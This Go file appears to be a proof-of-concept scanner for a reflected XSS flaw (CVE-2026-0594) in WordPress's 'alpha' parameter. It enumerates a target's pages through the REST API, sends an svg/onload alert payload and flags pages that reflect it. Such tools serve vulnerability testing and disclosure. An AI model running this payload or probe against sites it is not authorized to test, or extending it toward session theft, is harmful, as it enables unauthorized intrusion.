package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"sync"
	"time"
)

// ==============================================================================
// Author: m4sh_wacker
// CVE: CVE-2026-0594
// Description: Detects and demonstrates Reflected XSS in WordPress via the
//              'alpha' parameter. This vulnerability allows for client-side
//              code execution, potentially leading to session hijacking,
//              unauthorized administrative actions, and PII exfiltration
//              through DOM manipulation.
// ==============================================================================

const (
	Reset  = "\033[0m"
	Red    = "\033[31m"
	Green  = "\033[32m"
	Yellow = "\033[33m"
	Cyan   = "\033[36m"
	Bold   = "\033[1m"
)

type WPPage struct {
	Slug    string `json:"slug"`
	Content struct {
		Rendered string `json:"rendered"`
	} `json:"content"`
}

func main() {
	banner := `
    ____                      __   _   __     __ 
   / __ \________  ____ _____/ /  / | / /__  / /_
  / / / / ___/ _ \/ __ \/ __  /  /  |/ / _ \/ __/
 / /_/ / /  /  __/ /_/ / /_/ /  / /|  /  __/ /_  
/_____/_/   \___/\__,_/\__,_/  /_/ |_/\___/\__/

Author: m4sh_wacker
    `
	fmt.Printf("%s%s%s\n", Cyan, banner, Reset)

	const xssPayload = "?alpha=\"><svg/onload=alert(document.domain)>"

	reader := bufio.NewReader(os.Stdin)
	fmt.Printf("%s[*] Enter Target URL:%s ", Bold, Reset)
	target, _ := reader.ReadString('\n')
	target = strings.TrimSpace(target)

	if target == "" {
		return
	}
	target = strings.TrimSuffix(target, "/")

	apiURL := target + "/wp-json/wp/v2/pages"
	client := &http.Client{Timeout: 15 * time.Second}

	resp, err := client.Get(apiURL)
	if err != nil {
		fmt.Printf("%s[!] Error: %v%s\n", Red, err, Reset)
		return
	}
	defer resp.Body.Close()

	bodyBytes, _ := io.ReadAll(resp.Body)
	bodyStr := string(bodyBytes)

	start := strings.Index(bodyStr, "[")
	end := strings.LastIndex(bodyStr, "]")
	if start == -1 || end == -1 {
		return
	}
	cleanJSON := bodyStr[start : end+1]

	var pages []WPPage
	if err := json.Unmarshal([]byte(cleanJSON), &pages); err != nil {
		return
	}

	var wg sync.WaitGroup
	var mu sync.Mutex

	for _, page := range pages {
		if strings.Contains(page.Content.Rendered, "alpha=") {
			wg.Add(1)
			go func(p WPPage) {
				defer wg.Done()
				vulnURL := target + "/" + p.Slug + "/" + xssPayload

				checkResp, err := client.Get(vulnURL)
				if err == nil {
					defer checkResp.Body.Close()
					b, _ := io.ReadAll(checkResp.Body)
					if strings.Contains(string(b), "<svg/onload=alert(document.domain)>") {
						mu.Lock()
						fmt.Printf("%s[VULNERABLE]%s %s\n", Red, Reset, vulnURL)
						mu.Unlock()
					}
				}
			}(page)
		}
	}
	wg.Wait()
}

func r(s string) string {
	return s
}